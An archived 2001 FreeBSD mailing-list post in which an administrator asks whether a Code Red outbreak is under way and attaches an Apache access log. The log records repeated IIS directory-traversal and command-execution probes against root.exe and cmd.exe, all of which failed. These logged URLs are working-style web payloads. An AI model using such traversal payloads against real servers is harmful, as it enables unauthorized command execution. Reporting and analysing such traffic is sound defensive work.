From owner-freebsd-isp Tue Sep 18 10: 6:14 2001 Delivered-To: freebsd-isp@freebsd.org Received: from digitaldaemon.com (digitaldaemon.com [63.105.9.34]) by hub.freebsd.org (Postfix) with SMTP id BD3B337B40C for ; Tue, 18 Sep 2001 10:06:07 -0700 (PDT) Received: (qmail 86208 invoked from network); 18 Sep 2001 17:05:09 -0000 Received: from unknown (HELO digitaldaemon.com) (192.168.0.73) by digitaldaemon.com with SMTP; 18 Sep 2001 17:05:09 -0000 Message-ID: <3BA77DE8.8080304@digitaldaemon.com> Date: Tue, 18 Sep 2001 13:01:28 -0400 From: Jan Knepper User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:0.9.2) Gecko/20010726 Netscape6/6.1 X-Accept-Language: en-us MIME-Version: 1.0 To: FreeBSD ISP Subject: Code Red?! Content-Type: multipart/mixed; boundary="------------000803090402000102080303" Sender: owner-freebsd-isp@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org This is a multi-part message in MIME format. --------------000803090402000102080303 Content-Type: text/plain; charset=us-ascii; format=flowed Content-Transfer-Encoding: 7bit Is today an other Code Red day or did I miss something somewhere? Jan --------------000803090402000102080303 Content-Type: text/plain; name="httpd-access.log" Content-Transfer-Encoding: 7bit Content-Disposition: inline; filename="httpd-access.log" 63.105.91.99 - - [18/Sep/2001:13:00:22 -0400] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 299 63.105.91.99 - - [18/Sep/2001:13:00:22 -0400] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 299 "-" "-" 63.105.91.99 - - [18/Sep/2001:13:00:22 -0400] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 299 63.105.91.99 - - [18/Sep/2001:13:00:22 -0400] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 299 "-" "-" 63.105.91.99 - - [18/Sep/2001:13:00:23 -0400] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 299 63.105.91.99 - - [18/Sep/2001:13:00:23 -0400] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 299 "-" "-" 63.105.91.99 - - [18/Sep/2001:13:00:23 -0400] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 299 63.105.91.99 - - [18/Sep/2001:13:00:23 -0400] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 299 "-" "-" 63.105.91.99 - - [18/Sep/2001:13:00:23 -0400] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 299 63.105.91.99 - - [18/Sep/2001:13:00:23 -0400] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 299 "-" "-" 63.105.91.99 - - [18/Sep/2001:13:00:24 -0400] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 299 63.105.91.99 - - [18/Sep/2001:13:00:24 -0400] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 299 "-" "-" 63.105.91.99 - - [18/Sep/2001:13:00:27 -0400] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 299 63.105.91.99 - - [18/Sep/2001:13:00:27 -0400] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 299 "-" "-" 63.105.91.99 - - [18/Sep/2001:13:00:27 -0400] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 299 63.105.91.99 - - [18/Sep/2001:13:00:27 -0400] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 299 "-" "-" 63.105.91.99 - - [18/Sep/2001:13:00:27 -0400] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 299 63.105.91.99 - - [18/Sep/2001:13:00:27 -0400] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 299 "-" "-" 63.105.91.99 - - [18/Sep/2001:13:00:28 -0400] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 299 63.105.91.99 - - [18/Sep/2001:13:00:28 -0400] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 299 "-" "-" 63.105.91.99 - - [18/Sep/2001:13:00:28 -0400] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 299 63.105.91.99 - - [18/Sep/2001:13:00:28 -0400] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 299 "-" "-" 63.105.91.99 - - [18/Sep/2001:13:00:28 -0400] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 299 63.105.91.99 - - [18/Sep/2001:13:00:28 -0400] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 299 "-" "-" 63.105.91.99 - - [18/Sep/2001:13:00:29 -0400] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 288 63.105.91.99 - - [18/Sep/2001:13:00:29 -0400] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 288 "-" "-" 63.105.91.99 - - [18/Sep/2001:13:00:29 -0400] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 288 63.105.91.99 - - [18/Sep/2001:13:00:29 -0400] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 288 "-" "-" 63.105.91.99 - - [18/Sep/2001:13:00:29 -0400] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 299 63.105.91.99 - - [18/Sep/2001:13:00:29 -0400] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 299 "-" "-" 63.105.91.99 - - [18/Sep/2001:13:00:29 -0400] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 299 63.105.91.99 - - [18/Sep/2001:13:00:29 -0400] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 299 "-" "-" --------------000803090402000102080303-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-isp" in the body of the message